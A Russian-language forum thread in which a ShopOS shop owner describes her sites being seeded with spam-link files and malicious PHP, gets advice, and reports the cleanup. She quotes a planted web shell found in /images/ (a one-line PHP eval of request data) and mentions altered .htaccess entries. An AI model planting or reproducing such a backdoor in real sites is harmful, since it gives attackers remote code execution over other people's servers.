Порно-содержимое через кэш
Здравствуйте.
Возникла проблема: кто-то закидывает на сайты под управлением ShopOs 2 файла: qh.php и название_сайта.links
В php содержится какой-то код (простите, не разбираюсь), который представляет из себя кашу. Так обычно выглядят вредоносные коды. Второй - содержит кучу ссылок на порноресурсы.
2 моих сайта подверглись такому вмешательству.
Первый - я узнала случайно, просматривая логи обращений. Второй - проверяла сегодня целенаправленно.
В первом кроме этих файлов, в папке кэш была обнаружена еще одна папка, в которой лежали уже HTML - страницы. Как я думаю, они загрузились по этим ссылкам и сохранились в кэше системы.
Словом, очень не хочется, чтобы кто-то дескридитировал сайты.
Подскажите, пожалуйста, как бы избавиться от возможности вмешательства из вне?
В настройках сайтов кэш выключен - не использовать.
Но он все равно есть
тут вариантов несколько
1 - кто-то получил ftp доступ к вашим сайтам
2 - дыра в скрипте http://www.shopos.ru/forum/index.php?topic=6706.0
3 - дыра в скрипте не зависящая от пункта 3
4 - ну может хостинг ломанули
Активно ломятся в дирректорию /cache/system
На втором сайте, где обнаружен файл с расширением .links после удаления файла он снова появляется!
Я обновлялась с форума по критическим вопросам безопасности (редактор, какие-то заплатки).
Доступ по FTP исключен. Там только 1 пользователь и я меняю пароль почти каждый месяц.
Хостинг тоже вроде в порядке. Кроме сайтов на ShopOs на других нет ничего.
Есть активность на сайте под управлением DLE - там просто караул по попыткам регистрации.
При этом даже на сайтах, где нет движков - просто html - есть попытки найти несуществующую админку и зарегистрироваться.
Я не знаю, что делать! Атаки идут именно на кэш! Все выключено... но кэш работает и туда загружаются посторонние файлы!
Как запретить регистрацию пользователей?
Короче не знаю, связано ли это между собой или просто совпадение.
Отключила функцию комментариев к товарам (каким-то образом она осталась включена...) всем группам пользователей, кроме высокостатусных. Вычистила спам-комментарии - их обнаружилась куча - штук 20, наверное.
И все. Кэш чистый, файлы не появляются.
возможно у вас шел залит где-то в директории, а .links может быть от сапы или какие там биржы ссылок используются похожие файлы..
в любом случае, это все нужно смотреть, чистить и т.д...
советы только в выявление сторонних файлов и директорий их чистка. + анализ файлов движка на наличие стороннего кода.
Да, спасибо! Так и есть!
В папке /images/ найден файл a10.php с содержанием <?php eval(stripslashes($_REQUEST));?>
При этом в файл .htaccess были внесены записи, которых я не делала.
Все вроде вычистила, удалила. Буду смотреть еще, может что пропустила.
Спасибо огромное за подсказку! :-*
Если вдруг еще кто столкнется. Кроме указанных файлов был обнаружен еще один xmlmirror.php в корне сайта.
Словом, прочесывать надо весь сайт и почти каждый php
Раньше я думала: зачем в каждом файле писать
#####################################
# ShopOS: Shopping Cart Software.
# Copyright (c) 2008-2010
# http://www.shopos.ru
# http://www.shoposs.com
# Ver. 1.0.0
#####################################
А теперь именно это помогает определить родное от неродного.
Всем спасибо! Сайты спасены!
Источник
|
